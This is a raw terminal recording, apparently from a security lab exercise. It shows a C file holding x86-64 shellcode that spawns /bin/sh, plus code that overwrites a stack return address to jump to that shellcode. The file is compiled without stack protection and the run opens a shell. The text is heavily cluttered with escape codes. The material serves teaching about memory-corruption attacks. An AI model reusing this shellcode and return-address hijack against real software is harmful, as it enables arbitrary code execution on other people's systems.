Script started on Mon 07 Mar 2016 06:27:35 PM EST
]0;seclab@SecurityLabUbuntu64: ~/Downloadsseclab@SecurityLabUbuntu64:~/Downloads$ vi BufferRedirect.c
[?1049h[?1h=[2;1H▽[6n[1;1H  [1;1H[1;36r[?12;25h[?12l[?25h[27m[m[H[2J[?25l[36;1H"BufferRedirect.c" [New File][>c[2;1H[1m[34m~                                                                                   [3;1H~                                                                                   [4;1H~                                                                                   [5;1H~                                                                                   [6;1H~                                                                                   [7;1H~                                                                                   [8;1H~                                                                                   [9;1H~                                                                                   [10;1H~                                                                                   [11;1H~                                                                                   [12;1H~                                                                                   [13;1H~                                                                                   [14;1H~                                                                                   [15;1H~                                                                                   [16;1H~                                                                                   [17;1H~                                                                                   [18;1H~                                                                                   [19;1H~                                                                                   [20;1H~                                                                                   [21;1H~                                                                                   [22;1H~                                                                                   [23;1H~                                                                                   [24;1H~                                                                                   [25;1H~                                                                                   [26;1H~                                                                                   [27;1H~                                                                                   [28;1H~                                                                                   [29;1H~                                                                                   [30;1H~                                                                                   [31;1H~                                                                                   [32;1H~                                                                                   [33;1H~                                                                                   [34;1H~                                                                                   [35;1H~                                                                                   [m[36;67H0,0-1[9CAll[1;1H[?12l[?25hP+q436f\P+q6b75\P+q6b64\P+q6b72\P+q6b6c\P+q2332\P+q2334\P+q2569\P+q2a37\P+q6b31\[?25l[36;1H[K[36;1H:[?12l[?25hq[?25l[?12l[?25h[?25l[36;1H[K[36;1H[?1l>[?12l[?25h[?1049l]0;seclab@SecurityLabUbuntu64: ~/Downloadsseclab@SecurityLabUbuntu64:~/Downloads$ ls
[0m[01;32mattack[0m                  BufferRedirectViaStack64.c             power.s
attack.c                id_rsa.pub                             test.s
[01;32mBufferRedirect64[0m        id_rsa.pub.pub                         [01;32mvuln[0m
BufferRedirect64.c      linux system call quick reference.pdf  vuln.c
[01;32mBufferRedirectViaStack[0m  Part3aDemo.txt                         vuln.c~
]0;seclab@SecurityLabUbuntu64: ~/Downloadsseclab@SecurityLabUbuntu64:~/Downloads$ vi BufferRedirect64.c
[?1049h[?1h=[2;1H▽[6n[1;1H  [1;1H[1;36r[?12;25h[?12l[?25h[27m[m[H[2J[?25l[36;1H"BufferRedirect64.c" 82L, 1177C[>c[1;1H[35m#include [m[31m<unistd.h>[m
[35m#include [m[31m<signal.h>[m
[35m#include [m[31m<stdlib.h>[m
[35m#include [m[31m<malloc.h>[m
[35m#include [m[31m<sys/mman.h>[m
[35m#include [m[31m<string.h>[m
[35m#include [m[31m<errno.h>[m

[32mlong[m [32mlong[m  *hold;
[34m//used command "disas /r _start" to get Hex Code values for assembly[m
[32mchar[m shellcode[] = [31m"[m[35m\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11[m[31m"
"[m[35m\x48\xc1\xe7\x08[m[31m"
"[m[35m\x48\xc1\xef\x08[m[31m"
"[m[35m\x57[m[31m"
"[m[35m\x48\x89\xe7[m[31m"
"[m[35m\x48\x31\xc0[m[31m"
"[m[35m\x48\x31\xf6[m[31m"
"[m[35m\x48\x31\xd2[m[31m"
"[m[35m\xb0\x3b[m[31m"
"[m[35m\x0f\x05[m[31m"
"[m[35m\x00[m[31m"[m;

[34m//Replace the above shellcod buffer operations with the hex code for you shell code.[24;1H//NOTE: Make sure it is null terminated, but otherwise has no NULL characters embeddd[25;1Hed.[m

[32mvoid[m decoy([32mchar[m *cx)

{[30;9H[32mlong[m [32mlong[m *ret;[32;9Hhold= ([32mlong[m [32mlong[m *)&ret;[33;9H(*hold)=([32mlong[m [32mlong[m)cx;[34;9Hhold++;[35;9H(*hold)=([32mlong[m [32mlong[m)cx;[36;67H1,1[11CTop[1;1H[?12l[?25hP+q436f\P+q6b75\P+q6b64\P+q6b72\P+q6b6c\P+q2332\P+q2334\P+q2569\P+q2a37\P+q6b31\[?25l[36;67H2[2;1H[?12l[?25h[?25l[36;67H3[3;1H[?12l[?25h[?25l[36;67H4[4;1H[?12l[?25h[?25l[36;67H5[5;1H[?12l[?25h[?25l[36;67H6[6;1H[?12l[?25h[?25l[36;67H7[7;1H[?12l[?25h[?25l[36;67H8,0-1[8;1H[?12l[?25h[?25l[36;67H9,1  [9;1H[?12l[?25h[?25l[36;67H10,1[10;1H[?12l[?25h[?25l[36;68H1[11;1H[?12l[?25h[?25l[36;68H2[12;1H[?12l[?25h[?25l[36;68H3[13;1H[?12l[?25h[?25l[36;68H4[14;1H[?12l[?25h[?25l[36;68H5[15;1H[?12l[?25h[?25l[36;68H6[16;1H[?12l[?25h[?25l[36;68H7[17;1H[?12l[?25h[?25l[36;68H8[18;1H[?12l[?25h[?25l[36;68H9[19;1H[?12l[?25h[?25l[36;67H20[20;1H[?12l[?25h[?25l[36;68H1[21;1H[?12l[?25h[?25l[36;68H2,0-1[22;1H[?12l[?25h[?25l[36;68H3,1  [23;1H[?12l[?25h[?25l[36;68H4[24;1H[?12l[?25h[?25l[36;68H5,0-1[26;1H[?12l[?25h[?25l[36;68H6,1  [27;1H[?12l[?25h[?25l[36;68H7,0-1[28;1H[?12l[?25h[?25l[36;68H8,1  [29;1H[?12l[?25h[?25l[36;68H9,1-8[30;8H[?12l[?25h[?25l[36;67H30,0-1[31;1H[?12l[?25h[?25l[36;68H1,1-8[32;8H[?12l[?25h[?25l[36;68H2[33;8H[?12l[?25h[?25l[36;68H3[34;8H[?12l[?25h[?25l[36;68H4[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9Hhold++;[36;1H[K[36;67H35,1-8[9C2%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9H(*hold)=([32mlong[m [32mlong[m)cx;[36;67H[K[36;67H36,1-8[9C4%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9Hhold++;[36;67H[K[36;67H37,1-8[9C6%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9H(*hold)=([32mlong[m [32mlong[m)cx;[36;67H[K[36;67H38,1-8[9C8%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9Hhold++;[36;67H[K[36;67H39,1-8[8C10%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9H(*hold)=([32mlong[m [32mlong[m)cx;[36;67H[K[36;67H40,1-8[8C12%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9Hhold++;[36;67H[K[36;67H41,1-8[8C14%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9H(*hold)=([32mlong[m [32mlong[m)cx;[36;67H[K[36;67H42,1-8[8C16%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H43,0-1[8C18%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[19;1H[46m{[35;1H}[m[36;67H[K[36;67H44,1[10C20%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[18;1H{[34;1H}[36;67H[K[36;67H45,0-1[8C22%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;1H[32mvoid[m main ()[36;67H[K[36;67H46,1[10C25%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;1H{[36;67H[K[36;67H47,1[10C27%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9H[32mint[m pagesize;[36;67H[K[36;67H48,1-8[8C29%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9H[32mchar[m *buf;[36;67H[K[36;67H49,1-8[8C31%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H50,0-1[8C33%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9Hpagesize = sysconf(_SC_PAGE_SIZE);[36;67H[K[36;67H51,1-8[8C35%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9Hposix_memalign(&buf, pagesize, strlen(shellcode)+[31m10[m);[36;67H[K[36;67H52,1-8[8C37%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9H[34m//puts(shellcode);[m[36;67H[K[36;67H53,1-8[8C39%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9Hstrcpy(buf,shellcode);[36;67H[K[36;67H54,1-8[8C41%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9H[34m//puts(buf);[m[36;67H[K[36;67H55,1-8[8C43%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9Hmprotect(buf, strlen(shellcode)+[31m10[m, PROT_EXEC|PROT_WRITE|PROT_READ);[36;67H[K[36;67H56,1-8[8C45%[35;8H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[35;9Hdecoy(buf);[36;67H[K[36;67H57,1-8[8C47%[35;8H[?12l[?25h[?25l[1;35r[1;1H[2M[1;36r[34;9H[33mreturn[m;
}[36;67H[K[36;67H58,1-8[8C51%[34;8H[?12l[?25h[?25l[23;1H[46m{[35;1H}[m[36;68H9,1  [35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[22;1H{[34;1H}[36;67H[K[36;67H60,0-1[8C53%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H61,0-1[8C55%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H62,0-1[8C57%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H63,0-1[8C59%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H64,0-1[8C61%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H65,0-1[8C63%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H66,0-1[8C65%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H67,0-1[8C68%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H68,0-1[8C70%[35;1H[?12l[?25h[?25l[1;35r[35;1H
[1;36r[36;67H[K[36;67H69,0-1[8C72%[35;1H[?12l[?25h[?25l[36;68H8[34;1H[?12l[?25h[?25l[36;68H7[33;1H[?12l[?25h[?25l[36;68H6[32;1H[?12l[?25h[?25l[36;68H5[31;1H[?12l[?25h[?25l[36;68H4[30;1H[?12l[?25h[?25l[36;68H3[29;1H[?12l[?25h[?25l[36;68H2[28;1H[?12l[?25h[?25l[36;68H1[27;1H[?12l[?25h[?25l[36;68H0[26;1H[?12l[?25h[?25l[13;1H[46m{[25;1H}[m[36;67H59,1  [25;1H[?12l[?25h[?25l[36;67H[K[36;1H:[?12l[?25hw[?25l[?12l[?25hq[?25l[?12l[?25h[?25l"BufferRedirect64.c" 82L, 1177C written
[?1l>[?12l[?25h[?1049l]0;seclab@SecurityLabUbuntu64: ~/Downloadsseclab@SecurityLabUbuntu64:~/Downloads$ gcc -fno-stack-protectore[K BufferRedirect64.c  -o BufferRedirect64
BufferRedirect64.c: In function ‘main’:
BufferRedirect64.c:52:2: warning: passing argument 1 of ‘posix_memalign’ from incompatible pointer type [enabled by default]
  posix_memalign(&buf, pagesize, strlen(shellcode)+10);
  ^
In file included from BufferRedirect64.c:3:0:
/usr/include/stdlib.h:503:12: note: expected ‘void **’ but argument is of type ‘char **’
 extern int posix_memalign (void **__memptr, size_t __alignment, size_t __size)
            ^
]0;seclab@SecurityLabUbuntu64: ~/Downloadsseclab@SecurityLabUbuntu64:~/Downloads$ ./BufferRedirect64
$ date
Mon Mar  7 18:29:22 EST 2016
$ exit
]0;seclab@SecurityLabUbuntu64: ~/Downloadsseclab@SecurityLabUbuntu64:~/Downloads$ ./BufferRedirect64gcc -fno-stack-protector BufferRedirect64.c --o BufferRedirect64[A]0;seclab@SecurityLabUbuntu64: ~/Downloadsseclab@SecurityLabUbuntu64:~/Downloads$ [23Pvi BufferRedirect64.c
[K[A[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[K[K[K[K[K[K[K[K[K[K[K[K[K[K[K[K[K[K[K[K[Kexit
Script done on Mon 07 Mar 2016 06:29:31 PM EST
